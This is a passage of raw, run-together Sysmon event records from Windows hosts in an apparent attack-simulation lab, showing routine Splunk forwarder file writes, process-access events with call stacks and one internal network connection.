Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8A822CCFB8E86772D1B37E4ABCACFFF6,SHA256=D229CFDD09410E3833042ECAD0E3E439FFEF9941B8AA4BE32DFDC780D6B447FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221016Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:45.424{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4877D6B6D765AEA15DCA2AE582E7B467,SHA256=F87FF7E38427C8E5B705749DE3CB45F17BF862D76FAEE55C1E25397A49C49EDB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221033Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:46.861{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1726-6216-0305-000000003902}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221032Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:46.861{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221031Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:46.861{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221030Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:46.861{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221029Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:46.861{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221028Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:46.861{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221027Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:46.861{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221026Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:46.861{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221025Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:46.861{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221024Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:46.861{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1726-6216-0305-000000003902}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221023Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:46.861{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221022Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:46.861{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1726-6216-0305-000000003902}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221021Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:46.862{4F8D34B0-1726-6216-0305-000000003902}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221020Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:46.658{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61F24D80DB3097B048796E9A7BF5810C,SHA256=7C1307289EB1244B958F1B261048BB78137DABED8FEE4F5D2D03D5278FF4B7C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297152Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:46.406{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=379544E8AABA9BCEC826A4C2EA0B57DF,SHA256=5396E2CC944DDC506A4C2A5C691B75F8C35D743F0F8AD0936F808582AF43F093,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221019Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:46.517{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297153Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:47.455{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFF4EF9B04F748844A3CA6C86F864451,SHA256=BF0E60762B802C916E535255CE16A3FF40C8C1072398C9CF0DB2E521A588D1A2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221048Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:45.625{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51623-false10.0.1.12-8000- 10341000x8000000000000000221047Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:47.361{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1727-6216-0405-000000003902}3488C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221046Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:47.361{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221045Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:47.361{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221044Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:47.361{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221043Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:47.361{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221042Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:47.361{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221041Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:47.361{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221040Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:47.361{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221039Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:47.361{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221038Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 